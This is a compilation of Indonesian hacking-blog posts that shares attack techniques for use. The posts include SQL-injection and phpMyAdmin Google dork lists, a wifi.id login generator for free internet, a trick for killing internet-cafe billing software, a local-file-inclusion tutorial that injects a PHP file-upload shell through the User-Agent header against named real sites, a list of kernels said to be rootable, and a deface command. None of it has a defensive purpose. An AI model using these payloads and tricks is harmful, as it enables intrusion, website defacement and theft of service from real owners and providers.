Pagi Sobat DetektifH@cking nie ane share Private SQLi dorks ;), silakan di simak ajah dibawah ini :D

inurl:group_concat username 0x3a PASSWORD from robot

inurl:group_concat username 0x3a PASSWORD from pirates

inurl:group_concat username 0x3a PASSWORD from obama

inurl:group_concat username 0x3a PASSWORD from shadow

inurl:group_concat username 0x3a PASSWORD from khan

inurl:group_concat username 0x3a PASSWORD from paul

inurl:group_concat username 0x3a PASSWORD from pakistan

inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users

inurl:group_concat username 0x3a PASSWORD from adm

inurl:group_concat username 0x3a PASSWORD from admin

inurl:group_concat username 0x3a PASSWORD from user

inurl:concat username 0x3a password from sysibm.sysdummy1

inurl:concat username 0x3a password from israel

inurl:concat username 0x3a password from mr.bean

inurl:concat username 0x3a password from sysuser

inurl:concat username 0x3a password from sysadmin

inurl:/MyBB/Upload/inc/

inurl:db_mysql.php

inurl:sql.php?table=wp_users

inurl:sql.php?table=group

inurl:sql.php?table=phpMyAdmin

inurl:sql.php?table=users

inurl:sql.php?table=login

inurl:/phpMyAdmin/sql.php

inurl:sql.php?table=customer

inurl:sql.php?table=member

inurl:sql.php?table=account

inurl:sql.php?table=admin

inurl:sql.php?table=tblwhoislog

inurl:/usr/local/apache/htdocs

inurl:sql.php?table=jos_users

inurl:sql.php?table=mybb_users

inurl:sql.php?table=log

inurl:sql.php?table=pass

inurl:sql.php?table=information_schema

inurl:sql.php?table=proxies_priv

inurl:sql.php?table=mysql.user

inurl:sql.php?table=collection

inurl:sql.php?table=loginlog

inurl:sql.php?table=menu

inurl:sql.php?table=setting

inurl:sql.php?table=phpbb_users

inurl:/phpmyadmin/sql.php?db=mysql&sql_query=

inurl:union+select+filetype:asp

inurl:union+select+filetype:php

inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log

inurl:union 5.0.67-log

inurl:union» 4.1.22-log

inurl:union 5.0.32

inurl:union» 5.0.67

inurl:union» 5.0.51a-3ubuntu5

inurl:union» 5.1.63-cll

inurl:bootstrap.php

Semoga bermanfaat :t

Postingan ini pasti berguna bagi pengguna wifi kampus @ wifi.id apalagi lagi download software dengan akses internet super cepat.

nah, langsung aja Steb by Step :

Pertama : Download Toolsnya disini : Indowebster

Kedua : Download .NetFrameWork disini : Langsung


Ketiga : - Buka registry (logo windows + R -ketik regedit - Enter) (Start - Run - regedit - Enter )
- Klik kanan ke "HKEY-CLASSES-ROOT" lalu pilih New> Key
- Kasih nama "System"
- Klik kanan lagi key "System" pilih New>Key dan kasih nama "Windows"
- Klik kanan lagi "Windows" pilih New>Key dan kasih nama "Crypto"
- Setelah itu lihat dijendela sebelah kanan yang bernama "(default)", itu di klik kiri 2x,
dan ubah valuenya menjadi "8530" (tanpa tanda kutip),
- Lalu close, dan Restart komputer kamu.


Keempat :1. Pastikan laptop atau PC anda konek ke Wifi ID
2. Lalu buka aplikasi yang tadi di Download
3. Jika disuruh memasukkan kodenya, masukkan kode ini: "13-01-2003"
(tanpa tanda kutip)
4. Jika sudah, masukkan lagi form loginnya seperti dibawah ini:
- Username : Rakagi
- Password : Nyit-Nyit.Net
- Secure Kode : N3
Selesai, dah tekan tombol "login"
5. Klik Type ID Generator, Lalu pilih Speedy 1-5 Atau Special dan Generate
Saran admin : test Speedy 1 terlebih dahulu..
6. Copy ID atau no. yang keluar, atau bisa Auto Login
Saran Admin : langsung klick Button Auto Login
7. Jika "Gagal" klick tombol "Speedy x" lagi... klick Button Auto Login, dan seterusnya..
8. Jika masih "Gagal" pilih Type ID Generator yang lainnya Back to Spep 6 :D

Langsung Gratisan Internet sepuasnya..
Password Rar : reza1249itm

=====================================================================
Saran Saya :
Sebelum memakai Aplikasinya diharapkan Log Off terlebih dahulu, Connect @ Wifi.id - buka aplikasi - ikuti Step by Step.
begitu juga kalo udah abis paketnya, logoff terlebih dahulu, lalu masuk ke step by step lagi.. :)
=====================================================================

Content Creator: Ryanz San Rakagi

Sumber:devilzc0de

 

         Hi sobat DetektifH@cking Apakah anda sering browsing internet di warnet? Mungkin anda suka dengan trik. Ya, billing warnet bisa kita kelabui, salah satunya dengan Anti Virus SMADAV. Trik ini udah lama koh' tpi msih WORK ;). Mungkin agan* senior yg lain sudah tau trik ini kan ;), apa salahx kita berbagi kepeda yg belum tau :).Baiklah berikut caranya :


1. Sebelumnya anda harus pilih PAKET, jangan yang personal untuk mengsukseskan cara ini.
2. Lalu buka SMADAV Anti Virus
3. Klik menu "tools"
4. Pergi ke "process manager"
5. Cari proses "client008.exe" lalu klik kanan dan klik "kill" dan tekan Yes
6. Selesai, kini billing explorernya mati,
Selamat berinternet ria :D

Saran : Sebaiknya gunakan trik ini hanya pada warnet yang memiliki banyak komputer ataupun yang ramai pengunjungnya agar admin warnet tidak curiga.

NB: Kalau sobat ketahuan oleh pemilik WARNET semua di luar tanggung jawab saya :D 


Selamat mencoba :t 

Assalamualaikum ^_^

Selamat Pagi Sobat DetektetifH@cking, Nice Friday yeah :D ~ Pada kesempatan kali ini saya akan membagikan tutorial yang dikirim oleh teman saya ke kantor DetektifH@cking *cie elaah, bersyukur deh ane yang ngak bisa apa apa, punya banyak temen yang mau berbagi ke DetektifH@cking :D oke langsung saja yeah ;)

Sebelum Bahas Tutorial LFI saya akan Jelasin Singkat Apa Itu LFI ? :)

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. << udah cuma gitu :D Singkat kan ?? :z

Bahan yang Dibutuhkan :

1. Rokok + Kopi Kapal Api
2. Camilan
3. Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
4. shell / script file upload ..
5. Dork + Kesabaran Dalam Mencari Site Bug LFI , :D

Dork list :

inurl:.php?(*)=(*)php , inurl:.php?(*)=mapa.php , inurl:.php?caminho=(*)php , inurl:.php?(*)=Sitemap.php

ingat !! Harus Ada .php dibelakang = !!

Misal : inurl:.php?pg=mapa.php << harus ada .php  !!

Trick Search Dork LFI , by ./me !!

1. buka translate.google.com , xixiixixxiixixi :D
2. tulis text ente ke google translate yang berkaitan dengan file file di website !! Seperti = Sitemap , contact , daftar , dll ..
3. translate text yang sobat tulis ke berbagai bahasa .. misal sitemap , translate ke portugal jadi , mapa
4. masu''kan dork sobat ke google : inurl:.php?(*)=mapa.php << ingat Harus ada .php
5. Success !! ;)

Oke Bahan Udah Lengkap + Trick Dork Jadul by ./me , tinggal Tutorialnya aja ya !! Ok Lest Go ;)

1. Kita nemuin website yang vuln LFI.

contoh : http://site.com/main.php?file=news.php

2.list target : http://www.ibriec.org/menara_perkebunan/index.php?open=../../../../../../../../../../proc/self/environ

3.coba kita ganti page_05.php pada list target diatas :

  ../../../../../../../../../proc/self/environ

4. Jika Sobat mendapatkan yang seperti ini :

 SERVER_SIGNATURE=
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35 Server at baleman.co.id Port 80
UNIQUE_ID=Ua6ugso68-wAAF8wsfgAAAAKHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0SERVER_PORT=80HTTP_HOST=baleman.co.idREDIRECT_HANDLER=application/x-httpd-php5DOCUMENT_ROOT=/home/s2400x14/public_htmlSCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php5REQUEST_URI=/index_1.php?hal=../../../../../../../../../../../proc/self/environSCRIPT_NAME=/cgi-sys/php5HTTP_CONNECTION=keep-alivePATH_INFO=/index_1.phpREMOTE_PORT=18429PATH=/usr/local/bin:/usr/bin:/binPWD=/usr/local/cpanel/cgi-sysSERVER_ADMIN=webmaster@baleman.co.idREDIRECT_STATUS=200REDIRECT_QUERY_STRING=hal=../../../../../../../../../../../proc/self/environHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5PATH_TRANSLATED=/home/s2400x14/public_html/index_1.phpHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8REMOTE_ADDR=180.253.80.169SHLVL=0SERVER_NAME=baleman.co.idSERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35QUERY_STRING=hal=../../../../../../../../../../../proc/self/environSERVER_ADDR=202.58.243.17GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip, deflateREDIRECT_URL=/index_1.phpREQUEST_METHOD=GETHTTP_COOKIE=__utma=247167511.668754680.1370401967.1370401967.1370401967.1; __utmb=247167511.1.10.1370401967; __utmc=247167511; __utmz=247167511.1370401967.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Home | Jad

atau keluar : Document ROOT dan ada User Agent Itu Web rentan LFI ,, OK Ternyata proc/self/environ dapat kita akses ! Lest Go ;)

5.Sekarang mari kita injeksi dengan kode dengan meracuni http-headernya/User Agent , Tools yang Tadi (Tamper Data Udah Didownload kan :f ) Ok Kalau Sudah , Lanjut ;)

6.buka tamper data di firefox lalu Buka URL Tadi Yang Rentan LFI , Klik Start Tamper lalu Reload Halaman Site..

7.Muncul Kotak Box , jangan dicentang continue tampering .. , klik TAMPER

8.Pada Kolom/Kotak User agent , Hapus Text Tersebut ganti dengan Code berikut :

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> Mr.Mx4rz Was Here !!</p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" />

*shell akan keluar di : localhost/[path]/namashell.php
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close

10.Muncul Sebuah File Upload Di Halaman Site Yang Rentan LFI tersebut
   Nih ScreenShotnya : https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/424631_391238194318689_1778808128_n.jpg

11.Selanjutnya Upload Shell / Script Deface kamu ^_^

12.Success , Tinggal Diacak acak dalemnya :D


Just Hacking And Have Fun :t

Special Thanks to : Mr.Mx4rz atas kirimannya :)

Hei sobat DetektifH@cking gue punya berita bagus ;). Sebuah Exploit di twitter telah di temukan oleh seorang Hackerr....
Langsung saja lihat Screenshotnya..

Screenshot:

Exploit Ini Masih Priv8! kita hanya bisa mendapatkan Screenshotsnya saja :p =D

Pagi sobat DetektifH@cking hari ini saya akan membagikan Script Priv8 yang dapat membasmi para Kernel beriku ini :)

Linux 2.6.32-localhost.domain 358.2.1.el6.x86_64 # 1 SMP Wed 13 Mar 00:26:49 UTC 2013 x86_64
Linux 2.6.32-localhost.domain 358.6.1.el6.x86_64 # 1 SMP Tue 23 April 19:29:00 UTC 2013 x86_64
Linux 2.6.32-localhost.domain 279.19.1.el6.x86_64 # 1 SMP Wed 19 Desember 07:05:20 UTC 2012 x86_64
Linux 2.6.32-localhost.domain 279.22.1.el6.x86_64 # 1 SMP Tue Februari 6 03:10:46 UTC 2013 x86_64
Linux localhost.domain 3.2.2-ipprojects # 4 SMP Fri 3 Feb 2012 15:53:51 CET x86_64
Linux 2.6.32-localhost.domain 042stab076.5 # 1 SMP Mon 18 Mar 2013 20:41:34 MSK x86_64
Linux 2.6.32-localhost.domain 220.4.1.el6.x86_64 # 1 SMP Tue 24 Jan 2012 02:13:44 GMT x86_64
x86_64 # 1 SMP Tue 3 Apr 2013 00:05:42 EET x86_64
Linux 2.6.32-localhost.domain 042stab068.8 # 1 SMP Fri 7 Desember 17:06:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.22. 1.lve1.2.14.el6.x86_64 # 1 SMP Wed 6 Mar 2013 15:12:30 EET x86_64
Linux 2.6.32-localhost.domain 379.19.1.lve1.2.6.el6.x86_64 # 1 SMP Fri 18 Jan 2013 10:16:30 EST x86_64
Linux 2.6.32-localhost.domain 042stab053.5 # 1 SMP Tue 27 Mar 2012 11:42:17 MSD x86_64
Linux localhost.domain 2.6.32-279. el6.x86_64 # 1 SMP Fri 22 Jun 2012 12:19:21 UTC x86_64
Linux localhost.domain 3.2.0-0.bpo.3-amd64 # 1 SMP Thu Agustus 23 07:41:30 UTC 2012 x86_64
localhost.domain Linux 2.6.32-358.0.1.el6.x86_64 # 1 SMP Tue 27 Feb 2013 06:06:45 UTC x86_64
Linux 2.6.32-localhost.domain 042stab061.2 # 1 SMP Tue 24 Agustus 2012 09:07:21 MSK x86_64
Linux 2.6.32-localhost.domain 379.14.1.lve1.1.9.9.el6. X86_64 # 1 SMP Thu Desember 6 07:12:24 EST 2012 x86_64
Linux 2.6.32-12 localhost.domain-pve # 1 SMP Tue 15 Mei 2012 06:02:20 WIT x86_64
Linux localhost.domain 2.6.32-131.21 .1. el6.x86_64 # 1 SMP Tue 22 Nov 2011 19:48:09 GMT x86_64
Linux localhost.domain 3.2.7 # 1 SMP Sun 26 Feb 2012 23:00:18 CET x86_64
Linux localhost.domain 2.6.32-279.14 .1. el6.x86_64 # 1 SMP Tue 6 Nov 2012 23:43:09 UTC x86_64
. X86_64 # 1 SMP Tue 3 Apr 2013 14:28:52 EET x86_64
Linux 2.6.32-localhost.domain 320.4.1.lve1.1.4.el6.x86_64 # 1 SMP Wed 7 Mar 2012 06:32:27 EST x86_64
Linux 2.6.32-localhost.domain 220.7.1.el6.x86_64 # 1 SMP Wed 7 Mar 2012 00:52:02 GMT x86_64
Linux localhost.domain 2.6. 32-7-pve # 1 SMP Mon 13 Feb 2012 07:33:21 CET x86_64
Linux 2.6.32-localhost.domain 042stab062.2 # 1 SMP Tue 10 Okt 2012 18:28:35 MSK x86_64
Linux localhost.domain 2.6. 38 # 5 SMP Sat 19 Mar 2011 13:19:08 CET x86_64
Linux 2.6.32 localhost.domain # 1 SMP Wed 5 Sep 2012 22:46:20 MSK x86_64
Linux 2.6.32-localhost.domain 379.19.1.lve1. 2.7.el6.x86_64 # 1 SMP Tue 23 Jan 2013 14:53:41 EST x86_64
Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 # 1 SMP Fri 27 Apr 2012 18:23:24 MSK x86_64
localhost.domain Linux 2.6.32-16-pve # 1 SMP Tue 9 Nov 2012 11:42:51 CET x86_64
Linux 2.6.32-localhost.domain 220.17.1.el6.x86_64 # 1 SMP Tue 16 Mei 2012 00:01:37 WIB x86_64
Linux 2.6.32-localhost.domain 279.9.1.el6.x86_64 # 1 SMP Tue 25 Sep 2012 21:43:11 UTC x86_64
Linux 2.6.32-localhost.domain 042stab065.3 # 1 SMP Mon 12 Nov 21:59: 14 MSK 2012 x86_64
Linux 2.6.32-localhost.domain 279.5.2.el6.x86_64 # 1 SMP Tue 24 Agustus 2012 01:07:11 UTC x86_64
Linux 2.6.32-11 localhost.domain-pve # 1 SMP Wed April 11 07:17:05 WIT 2012 x86_64
Linux 2.6.38 localhost.domain-8-server # 42-Ubuntu SMP Mon 11 Apr 2011 03:49:04 UTC x86_64
Linux 2.6.32-localhost.domain 131.17.1.el6.x86_64 # 1 SMP Thu 6 Okt 2011 19:24:09 WIB x86_64
Linux 2.6.32-localhost.domain 042stab072.10 # 1 SMP Tue 16 Jan 2013 18:54:05 MSK x86_64
Linux localhost.domain 3.5.2 # 1 SMP Thu Agustus 23 17:07:20 WIT 2012 x86_64
Linux 2.6.32-localhost.domain 220.el6.x86_64 # 1 SMP Tue 6 Desember 2011 19:48:22 GMT x86_64
Linux 2.6.32-localhost.domain 279.2.1.el6 . x86_64 # 1 SMP Fri 20 Jul 2012 01:55:29 UTC x86_64
Linux 3.2.20 localhost.domain # 1 SMP Tue 28 Agustus 2012 02:39:06 MSK x86_64
Linux 2.6.32-localhost.domain 220.4.2.el6 . x86_64 # 1 SMP Tue 14 Feb 2012 04:00:16 GMT x86_64
Linux 2.6.32-localhost.domain 279.5.1.el6.x86_64 # 1 SMP Tue 14 Agustus 2012 23:54:45 UTC x86_64
Linux localhost.domain 2.6 .32-358.2.1. el6.x86_64 # 1 SMP Wed 13 Mar 00:26:49 UTC 2013 x86_64 GNU / Linux

Script klik DISINI

Malam sobat DetektifH@cking, banyak hacker menemukan masalah besar ketika mereka aka meng-upload shell pada website joomla dan tidak di izinkan untuk mengedit file seperti " index.php "

Nah skrang ane akan menunjukkan kepada Anda bagaimana bypass the permission !!!!

Hal pertama meng-upload script perl atau python atau cgi seperti yang sobat inginkan. 

kemudian pergi ke arah mana Sobat ingin mengedit (deface) file seperti ini: 

cd / home / user / public_html / 

Kemudian ketik perintah ini: 

echo 'Taruh disini kode deface Sobat'>  / home / user / public_html / index.php

Sekian Trima Kasih.. ;)

Pagi sobat DetektifH@cking ane share lagi nhe Program Hacking =D. Nama-nya Joomla Security Scanner v 1.0 ini sangat berguna, jika sobat ingin menemukan/mengeksploitasi di situs joomla. Enj0y! =D

Screenshot:

Download:

Password: Lihat

Pagi sobat DetektifH@cking ini hari ane akan share perangkat lunak terbaik untuk menjelajah situs ini tidak populer tapi ini yang terbaik yang ane pikir. kode ini ane dapat dari teman ane r3dm0v3. Enjoy =D

Screenshoot: 

Download

Password: Lihat

"Berbagi Itu Indah"